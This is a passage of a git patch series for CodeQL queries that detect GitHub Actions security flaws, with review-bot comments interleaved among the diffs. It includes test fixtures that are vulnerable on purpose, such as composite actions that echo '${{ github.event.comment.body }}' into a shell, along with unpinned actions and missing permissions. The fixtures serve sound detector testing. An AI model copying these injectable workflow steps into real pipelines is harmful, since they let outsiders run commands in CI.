tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... 
ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. |
+| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. |
diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref new file mode 100644
index 00000000000..edaea6fbb21
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref
@@ -0,0 +1 @@
+Security/CWE-094/ExpressionInjection.ql
diff --git a/ql/test/query-tests/Security/CWE-094/action1/action.yml b/ql/test/query-tests/Security/CWE-094/action1/action.yml new file mode 100644
index 00000000000..8bfa15b405c
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/action1/action.yml
@@ -0,0 +1,14 @@
+name: 'test'
+description: 'test'
+branding:
+ icon: 'test'
+ color: 'test'
+inputs:
+ test:
+ description: test
+ required: false
+ default: 'test'
+runs:
+ using: "composite"
+ steps:
+ - run: echo '${{ github.event.comment.body }}'
diff --git a/ql/test/query-tests/Security/CWE-094/action2/action.yml b/ql/test/query-tests/Security/CWE-094/action2/action.yml new file mode 100644
index 00000000000..20f8d227348
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/action2/action.yml
@@ -0,0 +1,17 @@
+name: 'Hello World'
+description: 'Greet someone and record the time'
+inputs:
+ who-to-greet: # id of input
+ description: 'Who to greet'
+ required: true
+ default: 'World'
+outputs:
+ time: # id of output
+ description: 'The time we greeted you'
+runs:
+ using: 'docker'
+ steps: # this is actually invalid, used to test we correctly identify composite actions
+ - run: echo '${{ github.event.comment.body }}'
+ image: 'Dockerfile'
+ args:
+ - ${{ inputs.who-to-greet }}
diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml new file mode 100644
index 00000000000..f000ad6a287
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml
@@ -0,0 +1,10 @@
+on:
+ pull_request
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+
diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml new file mode 100644
index 00000000000..b34dfeec641
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml
@@ -0,0 +1,13 @@
+on:
+ pull_request
+
+permissions: {}
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+
+
diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected new file mode 100644
index 00000000000..174f9d49e87
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected
@@ -0,0 +1 @@
+| .github/workflows/missing_perms.yml:6:5:9:32 | name: Build and test | Actions Job or Workflow does not set permissions |
diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref new file mode 100644
index 00000000000..ad1c6a99660
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref
@@ -0,0 +1,2 @@
+Security/CWE-275/MissingActionsPermissions.ql
+
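Review bot: The negative fixture `perms.yml` only exercises a workflow-level `permissions: {}`, so among the CWE-275 fixtures shown here nothing checks that a job which sets its own permissions is left unreported. The expected message reads "Actions Job or Workflow does not set permissions", which suggests both levels are meant to be recognised. Consider a second job or fixture with no top-level key and a job-level block such as `permissions:` followed by `contents: read` under `build:`, expected to produce no row. A short comment at the top of each fixture saying whether it should be flagged would also make the `.expected` file easier to audit.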
diff --git a/ql/src/test/.github/workflows/actor_trusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml similarity index 100% rename from ql/src/test/.github/workflows/actor_trusted_checkout.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml
diff --git a/ql/src/test/.github/workflows/label_trusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout.yml similarity index 100% rename from ql/src/test/.github/workflows/label_trusted_checkout.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml new file mode 100644
index 00000000000..992686fb5aa
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml
@@ -0,0 +1,11 @@
+on:
+ pull_request
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: foo/bar
+ - uses: foo/bar@v1
+ - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb
diff --git a/ql/src/test/.github/workflows/untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml similarity index 100% rename from ql/src/test/.github/workflows/untrusted_checkout.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml
diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected new file mode 100644
index 00000000000..169d9c9ac2b
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
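Review bot: The three `uses:` steps in `unpinned_tags.yml` carry no indication of which ones the query is expected to report, and the ref-less `- uses: foo/bar` is not reported. The accompanying `UnpinnedActionsTag.expected` lists only the `foo/bar@v1` step for this file, so a step with no ref at all passes silently even though it is not pinned to a commit either. If that omission is deliberate (for example because a ref-less reference is treated as invalid syntax), say so next to the step, e.g. `# no ref: intentionally not reported by UnpinnedActionsTag`, and mark the other two with `# unpinned tag: reported` and `# pinned SHA: not reported`. If it is not deliberate, the query and the expected output need a row for line 9.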
@@ -0,0 +1,7 @@ +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | +| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | +| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | uses: foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | uses: foo/bar@v1 | uses: foo/bar@v1 | +| .github/workflows/untrusted_checkout.yml:18:7:22:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:18:7:22:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | +| .github/workflows/untrusted_checkout.yml:22:7:25:21 | uses: f ... 
n-pr@v1 | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:22:7:25:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref new file mode 100644 index 00000000000..8c9db66bf6b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref @@ -0,0 +1 @@ +Security/CWE-829/UnpinnedActionsTag.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected new file mode 100644 index 00000000000..76d47eec191 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -0,0 +1 @@ +| .github/workflows/untrusted_checkout.yml:9:7:13:4 | uses: a ... kout@v2 | Potential unsafe checkout of untrusted pull request on 'pull_request_target'. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref new file mode 100644 index 00000000000..b0c41e712e5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckout.ql From 0eabdd9507685da01ff505fb88fc338cba4a8761 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 1 Mar 2024 09:44:33 +0100 Subject: [PATCH 0081/1267] Rename classes --- ql/lib/codeql/actions/Ast.qll | 275 +++++++++--------- .../actions/controlflow/BasicBlocks.qll | 1 - .../actions/controlflow/internal/Cfg.qll | 101 +++---- .../codeql/actions/dataflow/ExternalFlow.qll | 6 +- .../codeql/actions/dataflow/FlowSources.qll | 6 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 59 ++-- .../dataflow/internal/DataFlowPublic.qll | 12 +- ql/src/Debug/partial.ql | 2 +- .../Security/CWE-020/CompositeActionsSinks.ql | 4 +- .../CWE-020/CompositeActionsSources.ql | 4 +- .../CWE-020/CompositeActionsSummaries.ql | 4 +- .../CWE-020/ReusableWorkflowsSinks.ql | 4 +- .../CWE-020/ReusableWorkflowsSources.ql | 4 +- .../CWE-020/ReusableWorkflowsSummaries.ql | 4 +- .../CWE-094/CriticalExpressionInjection.ql | 5 +- .../Security/CWE-094/ExpressionInjection.ql | 2 +- .../CWE-275/MissingActionsPermissions.ql | 8 +- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 4 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 20 +- ql/test/library-tests/test.expected | 61 +--- ql/test/library-tests/test.ql | 44 ++- 22 files changed, 292 insertions(+), 340 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 2bbf5c8ac0d..881daf13336 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -2,7 +2,7 @@ private import codeql.actions.ast.internal.Actions private import codeql.Locations /** - * Base class for the AST tree. Based on YamlNode from the Yaml library. + * Base class for thejAST tree. Based on YamlNode from the Yaml library. */ class AstNode instanceof YamlNode { AstNode getParentNode() { result = super.getParentNode() } 
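Review bot: The first hunk of `Ast.qll` introduces a typo into the QLDoc of `AstNode`: the new line reads "Base class for thejAST tree", where the old line had "the AST tree". This looks like a stray keystroke picked up with the rename rather than an intended change. Restore the line as ` * Base class for the AST tree. Based on YamlNode from the Yaml library.`. The body of `AstNode` continues outside this hunk.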
@@ -14,20 +14,16 @@ class AstNode instanceof YamlNode { string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } Location getLocation() { result = super.getLocation() } -} - -/** - * A statement is a group of expressions and/or statements that you design to carry out a task or an action. - * Any statement that can return a value is automatically qualified to be used as an expression. - */ -class Statement extends AstNode { - /** Gets the workflow that this job is a part of. */ - WorkflowStmt getEnclosingWorkflowStmt() { this = result.getAChildNode*() } /** - * Gets a environment variable expression by name in the scope of the current step. + * Gets the enclosing workflow statement. */ - Expression getEnvExpr(string name) { + Workflow getEnclosingWorkflow() { this = result.getAChildNode*() } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + EnvExpr getEnvExpr(string name) { exists(Actions::Env env | env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) | 
@@ -40,37 +36,32 @@ class Statement extends AstNode { } } -/** - * An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. - */ -class Expression extends Statement { } - /** * A composite action */ -class CompositeActionStmt extends Statement instanceof Actions::CompositeAction { - RunsStmt getRunsStmt() { result = super.getRuns() } +class CompositeAction extends AstNode instanceof Actions::CompositeAction { + Runs getRuns() { result = super.getRuns() } - InputsStmt getInputsStmt() { result = this.(YamlMapping).lookup("inputs") } + Inputs getInputs() { result = this.(YamlMapping).lookup("inputs") } - OutputsStmt getOutputsStmt() { result = this.(YamlMapping).lookup("outputs") } + Outputs getOutputs() { result = this.(YamlMapping).lookup("outputs") } } -class RunsStmt extends Statement instanceof Actions::Runs { - StepStmt getAStepStmt() { result = super.getSteps().getElementNode(_) } +class Runs extends AstNode instanceof Actions::Runs { + Step getAStep() { result = super.getSteps().getElementNode(_) } - StepStmt getStepStmt(int i) { result = super.getSteps().getElementNode(i) } + Step getStep(int i) { result = super.getSteps().getElementNode(i) } } /** * A Github Actions Workflow */ -class WorkflowStmt extends Statement instanceof Actions::Workflow { +class Workflow extends AstNode instanceof Actions::Workflow { string getName() { result = super.getName() } - JobStmt getAJobStmt() { result = super.getJob(_) } + Job getAJob() { result = super.getJob(_) } - JobStmt getJobStmt(string id) { result = super.getJob(id) } + Job getJob(string id) { result = super.getJob(id) } predicate hasTriggerEvent(string trigger) { exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) 
@@ -80,27 +71,25 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) } - Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } + Permissions getPermissions() { result = this.(YamlMapping).lookup("permissions") } - StrategyStmt getStrategyStmt() { result = this.(YamlMapping).lookup("strategy") } + Strategy getStrategy() { result = this.(YamlMapping).lookup("strategy") } } -class ReusableWorkflowStmt extends WorkflowStmt { +class ReusableWorkflow extends Workflow { YamlValue workflow_call; - ReusableWorkflowStmt() { - this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call - } + ReusableWorkflow() { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - InputsStmt getInputsStmt() { result = workflow_call.(YamlMapping).lookup("inputs") } + Inputs getInputs() { result = workflow_call.(YamlMapping).lookup("inputs") } - OutputsStmt getOutputsStmt() { result = workflow_call.(YamlMapping).lookup("outputs") } + Outputs getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } } -class InputsStmt extends Statement instanceof YamlMapping { +class Inputs extends AstNode instanceof YamlMapping { YamlMapping parent; - InputsStmt() { parent.lookup("inputs") = this } + Inputs() { parent.lookup("inputs") = this } /** * Gets a specific input expression (YamlMapping) by name. @@ -111,10 +100,10 @@ class InputsStmt extends Statement instanceof YamlMapping { } } -class OutputsStmt extends Statement instanceof YamlMapping { +class Outputs extends AstNode instanceof YamlMapping { YamlMapping parent; - OutputsStmt() { parent.lookup("outputs") = this } + Outputs() { parent.lookup("outputs") = this } /** * Gets a specific output expression (YamlMapping) by name. 
@@ -127,10 +116,16 @@ class OutputsStmt extends Statement instanceof YamlMapping { string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } } -class StrategyStmt extends Statement instanceof YamlMapping { +class Permissions extends AstNode instanceof YamlMapping { YamlMapping parent; - StrategyStmt() { parent.lookup("strategy") = this } + Permissions() { parent.lookup("permissions") = this } +} + +class Strategy extends AstNode instanceof YamlMapping { + YamlMapping parent; + + Strategy() { parent.lookup("strategy") = this } /** * Gets a specific matric expression (YamlMapping) by name. @@ -144,31 +139,10 @@ class StrategyStmt extends Statement instanceof YamlMapping { } } -class InputExpr extends Expression instanceof YamlString { - InputExpr() { exists(InputsStmt inputs | inputs.(YamlMapping).maps(this, _)) } -} - -class OutputExpr extends Expression instanceof YamlString { - OutputExpr() { - exists(OutputsStmt outputs | - outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or - outputs.(YamlMapping).lookup(_) = this - ) - } -} - -class MatrixVariableExpr extends Expression instanceof YamlString { - MatrixVariableExpr() { - exists(StrategyStmt outputs | - outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this - ) - } -} - /** * A Job is a collection of steps that run in an execution environment. */ -class JobStmt extends Statement instanceof Actions::Job { +class Job extends AstNode instanceof Actions::Job { /** * Gets the ID of this job, as a string. * This is the job's key within the `jobs` mapping. 
@@ -176,20 +150,20 @@ class JobStmt extends Statement instanceof Actions::Job { string getId() { result = super.getId() } /** Gets the step at the given index within this job. */ - StepStmt getStepStmt(int index) { result = super.getStep(index) } + Step getStep(int index) { result = super.getStep(index) } /** Gets any steps that are defined within this job. */ - StepStmt getAStepStmt() { result = super.getStep(_) } + Step getAStep() { result = super.getStep(_) } /** * Gets a needed job. * eg: * - needs: [job1, job2] */ - JobStmt getNeededJob() { + Job getNeededJob() { exists(Actions::Needs needs | needs.getJob() = this and - result = needs.getANeededJob().(JobStmt) + result = needs.getANeededJob() ) } @@ -199,7 +173,7 @@ class JobStmt extends Statement instanceof Actions::Job { * out1: ${steps.foo.bar} * out2: ${steps.foo.baz} */ - OutputsStmt getOutputsStmt() { result = this.(Actions::Job).lookup("outputs") } + Outputs getOutputs() { result = this.(Actions::Job).lookup("outputs") } /** * Reusable workflow jobs may have Uses children 
@@ -209,42 +183,42 @@ class JobStmt extends Statement instanceof Actions::Job { * with: * arg1: value1 */ - JobUsesExpr getUsesExpr() { result.getJobStmt() = this } + JobUses getUses() { result.getJob() = this } predicate usesReusableWorkflow() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) } - IfStmt getIfStmt() { result = super.getIf() } + If getIf() { result = super.getIf() } - Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } + Permissions getPermissions() { result = this.(YamlMapping).lookup("permissions") } - StrategyStmt getStrategyStmt() { result = this.(YamlMapping).lookup("strategy") } + Strategy getStrategy() { result = this.(YamlMapping).lookup("strategy") } } /** * A Step is a single task that can be executed as part of a job. */ -class StepStmt extends Statement instanceof Actions::Step { +class Step extends AstNode instanceof Actions::Step { string getId() { result = super.getId() } - JobStmt getJobStmt() { result = super.getJob() } + Job getJob() { result = super.getJob() } - IfStmt getIfStmt() { result = super.getIf() } + If getIf() { result = super.getIf() } } /** * An If node representing a conditional statement. */ -class IfStmt extends Statement { +class If extends AstNode { YamlMapping parent; - IfStmt() { + If() { (parent instanceof Actions::Step or parent instanceof Actions::Job) and parent.lookup("if") = this } - Statement getEnclosingStatement() { result = parent } + AstNode getEnclosingNode() { result = parent } string getCondition() { result = this.(YamlScalar).getValue() } } @@ -252,7 +226,7 @@ class IfStmt extends Statement { /** * Abstract class representing a call to a 3rd party action or reusable workflow. */ -abstract class UsesExpr extends Expression { +abstract class Uses extends AstNode { abstract string getCallee(); abstract string getVersion(); 
@@ -263,10 +237,10 @@ abstract class UsesExpr extends Expression { /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class StepUsesExpr extends StepStmt, UsesExpr { +class StepUses extends Step, Uses { Actions::Uses uses; - StepUsesExpr() { uses.getStep() = this } + StepUses() { uses.getStep() = this } override string getCallee() { result = uses.getGitHubRepository() } @@ -288,12 +262,10 @@ class StepUsesExpr extends StepStmt, UsesExpr { /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class JobUsesExpr extends UsesExpr instanceof YamlMapping { - JobUsesExpr() { - this instanceof JobStmt and this.maps(any(YamlString s | s.getValue() = "uses"), _) - } +class JobUses extends Uses instanceof YamlMapping { + JobUses() { this instanceof Job and this.maps(any(YamlString s | s.getValue() = "uses"), _) } - JobStmt getJobStmt() { result = this } + Job getJob() { result = this } /** * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. @@ -336,10 +308,10 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { /** * A Run step represents the evaluation of a provided script */ -class RunExpr extends StepStmt, Expression { +class Run extends Step { Actions::Run scriptExpr; - RunExpr() { scriptExpr.getStep() = this } + Run() { scriptExpr.getStep() = this } Expression getScriptExpr() { result = scriptExpr } 
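Review bot: `Expression getScriptExpr()` in `Run` is carried over as an unchanged line, but this commit redefines `Expression` further down in Ast.qll as a `YamlString` for which `Actions::getASimpleReferenceExpression` yields a value, so the predicate now only has a result for scripts that contain a `${{ }}` reference instead of for every run script. If the old broad meaning is what callers rely on, the declaration should become `AstNode getScriptExpr() { result = scriptExpr }`. The same stale type is kept in `envCtxLocalStep` in DataFlowPrivate.qll, where the new line still says `Expression astFrom` while `inputsCtxLocalStep` and `matrixCtxLocalStep` switch to `AstNode astFrom`. There `getTarget()` returns an env value and `externallyDefinedSource` appears to yield `Uses` nodes (its body is not fully visible), so that step probably loses flow for taint queries; `exists(AstNode astFrom, EnvExpression astTo |` would match its siblings.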
@@ -347,24 +319,59 @@ class RunExpr extends StepStmt, Expression { } /** - * Evaluation of a workflow expression ${{}}. + * An AST node associated with a Reusable Workflow input. */ -class ExprAccessExpr extends Expression instanceof YamlString { - string expr; - - ExprAccessExpr() { expr = Actions::getASimpleReferenceExpression(this) } - - string getExpression() { result = expr } - - JobStmt getJobStmt() { result.getAChildNode*() = this } +class InputExpr extends AstNode { + InputExpr() { exists(Inputs inputs | inputs.(YamlMapping).maps(this, _)) } } /** - * A context access expression. + * An AST node holding an Env var value. + */ +class EnvExpr extends AstNode { + EnvExpr() { exists(Actions::Env env | env.(YamlMapping).lookup(_) = this) } +} + +/** + * An AST node holding a job or workflow output var. + */ +class OutputExpr extends AstNode { + OutputExpr() { + exists(Outputs outputs | + outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or + outputs.(YamlMapping).lookup(_) = this + ) + } +} + +/** + * An AST node holding a matrix var. + */ +class MatrixVariableExpr extends AstNode { + MatrixVariableExpr() { + exists(Strategy outputs | outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this) + } +} + +/** + * Evaluation of a workflow expression ${{}}. + */ +class Expression extends AstNode instanceof YamlString { + string expr; + + Expression() { expr = Actions::getASimpleReferenceExpression(this) } + + string getExpression() { result = expr } + + Job getJob() { result.getAChildNode*() = this } +} + +/** + * A ${{}} expression accessing a context variable. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ -class CtxAccessExpr extends ExprAccessExpr { - CtxAccessExpr() { +class ContextExpression extends Expression { + ContextExpression() { expr.regexpMatch([ stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), matrixCtxRegex() 
@@ -373,7 +380,7 @@ class CtxAccessExpr extends ExprAccessExpr { abstract string getFieldName(); - abstract Expression getRefExpr(); + abstract AstNode getTarget(); } private string stepsCtxRegex() { @@ -406,11 +413,11 @@ private string wrapRegexp(string regex) { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` */ -class StepsCtxAccessExpr extends CtxAccessExpr { +class StepsExpression extends ContextExpression { string stepId; string fieldName; - StepsCtxAccessExpr() { + StepsExpression() { expr.regexpMatch(stepsCtxRegex()) and stepId = expr.regexpCapture(stepsCtxRegex(), 1) and fieldName = expr.regexpCapture(stepsCtxRegex(), 2) @@ -418,9 +425,9 @@ class StepsCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } - override Expression getRefExpr() { + override AstNode getTarget() { this.getLocation().getFile() = result.getLocation().getFile() and - result.(StepStmt).getId() = stepId + result.(Step).getId() = stepId } } @@ -429,12 +436,12 @@ class StepsCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ needs.job1.outputs.foo}}` */ -class NeedsCtxAccessExpr extends CtxAccessExpr { - JobStmt job; +class NeedsExpression extends ContextExpression { + Job job; string jobId; string fieldName; - NeedsCtxAccessExpr() { + NeedsExpression() { expr.regexpMatch(needsCtxRegex()) and jobId = expr.regexpCapture(needsCtxRegex(), 1) and fieldName = expr.regexpCapture(needsCtxRegex(), 2) and 
@@ -445,14 +452,14 @@ class NeedsCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } - override Expression getRefExpr() { + override AstNode getTarget() { job.getLocation().getFile() = this.getLocation().getFile() and ( // regular jobs - job.getOutputsStmt() = result + job.getOutputs() = result or // reusable workflow calling jobs - job.getUsesExpr() = result + job.getUses() = result ) } } @@ -462,11 +469,11 @@ class NeedsCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows) */ -class JobsCtxAccessExpr extends CtxAccessExpr { +class JobsExpression extends ContextExpression { string jobId; string fieldName; - JobsCtxAccessExpr() { + JobsExpression() { expr.regexpMatch(jobsCtxRegex()) and jobId = expr.regexpCapture(jobsCtxRegex(), 1) and fieldName = expr.regexpCapture(jobsCtxRegex(), 2) @@ -474,11 +481,11 @@ class JobsCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } - override Expression getRefExpr() { - exists(JobStmt job | + override AstNode getTarget() { + exists(Job job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - job.getOutputsStmt() = result + job.getOutputs() = result ) } } 
@@ -488,21 +495,23 @@ class JobsCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ inputs.foo }}` */ -class InputsCtxAccessExpr extends CtxAccessExpr { +class InputsExpression extends ContextExpression { string fieldName; - InputsCtxAccessExpr() { + InputsExpression() { expr.regexpMatch(inputsCtxRegex()) and fieldName = expr.regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override Expression getRefExpr() { + override AstNode getTarget() { result.getLocation().getFile() = this.getLocation().getFile() and - exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(fieldName) = result) - or - exists(CompositeActionStmt a | a.getInputsStmt().getInputExpr(fieldName) = result) + ( + exists(ReusableWorkflow w | w.getInputs().getInputExpr(fieldName) = result) + or + exists(CompositeAction a | a.getInputs().getInputExpr(fieldName) = result) + ) } } @@ -511,18 +520,18 @@ class InputsCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ env.foo }}` */ -class EnvCtxAccessExpr extends CtxAccessExpr { +class EnvExpression extends ContextExpression { string fieldName; - EnvCtxAccessExpr() { + EnvExpression() { expr.regexpMatch(envCtxRegex()) and fieldName = expr.regexpCapture(envCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override Expression getRefExpr() { - exists(Statement s | + override AstNode getTarget() { + exists(AstNode s | s.getEnvExpr(fieldName) = result and s.getAChildNode*() = this ) 
